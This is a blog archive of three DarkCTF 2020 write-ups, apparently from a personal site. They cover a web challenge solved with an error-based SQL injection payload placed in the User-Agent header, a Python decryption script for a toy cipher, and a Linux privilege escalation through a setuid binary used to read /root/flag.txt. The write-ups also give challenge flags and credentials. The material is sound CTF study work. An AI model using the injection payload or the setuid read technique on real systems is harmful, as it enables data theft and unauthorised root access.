Cookie Consent by PrivacyPolicies.com

Archives of tag ctf


Tag ctf

DarkCTF 2020: Web/Agent-U

Web/Agent-U

395 points

Agent U stole a database from my company but I don't know which one. Can u help me to find it?

http://agent.darkarmy.xyz/

flag format darkCTF{databasename}

Solution

From the source we can get info, that default credentials are admin/admin.

Site after login shows my user agent, so my first idea was to perform sql injection through my user agent.

After few attempts I ended up finally with below user agent setup ;-)

', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 1,1))), NULL); -- .

BINGO!

darkCTF{ag3nt_u_1s_v3ry_t3l3nt3d}

DarkCTF 2020: Cryptography/WEIRD ENCRYPTION

Cryptography/WEIRD ENCRYPTION

377 points

I made this weird encryption I hope you can crack it.

File

enc.py

prefix="Hello. Your flag is DarkCTF{"
suffix="}."
main_string="c an u br ea k th is we ir d en cr yp ti on".split()

clear_text = prefix + flag + suffix
enc_text = ""
for letter in clear_text:
c1 = ord(letter) / 16
c2 = ord(letter) % 16
enc_text += main_string[c1]
enc_text += main_string[c2]

print enc_text

Encrypted

eawethkthcrthcrthonutiuckirthoniskisuucthththcrthanthisucthirisbruceaeathanisutheneabrkeaeathisenbrctheneacisirkonbristhwebranbrkkonbrisbranthypbrbrkonkirbrciskkoneatibrbrbrbrtheakonbrisbrckoneauisubrbreacthenkoneaypbrbrisyputi

Solution

main_string = "c an u br ea k th is we ir d en cr yp ti on".split()
flag = open('Encrypted', 'r').read()

def decrypt(letter):
return main_string.index(letter[0]) * 16 + main_string.index(letter[1])


part = ''
letter = []
decrypted = ''
for j, i in enumerate(flag):
part += i
if part in main_string and not (part == 'c' and flag[j+1] == 'r'):
letter.append(part)
part = ''
if len(letter) == 2:
decrypted += chr(decrypt(letter))
letter = []

print(decrypted)

DarkCTF{[email protected][email protected]_M3}

 

DarkCTF 2020: Linux/Squids

Linux/Squids

470 points

Squids in the linux pool

Note: No automation tool required.

ssh [email protected] -p 10000 password: wolfie

Solution

Not much to comment, it take me literally a minute to find the flag.

Found suspicious /opt dir with lots of dirs which I didn't want to manually check, so I've executed find . from within the /opt, found iamroot binary which looks like cat with root permissions (setuid). So I've used the found binary to have a look into /root/flag.txt

darkCTF{y0u_f0und_the_squ1d}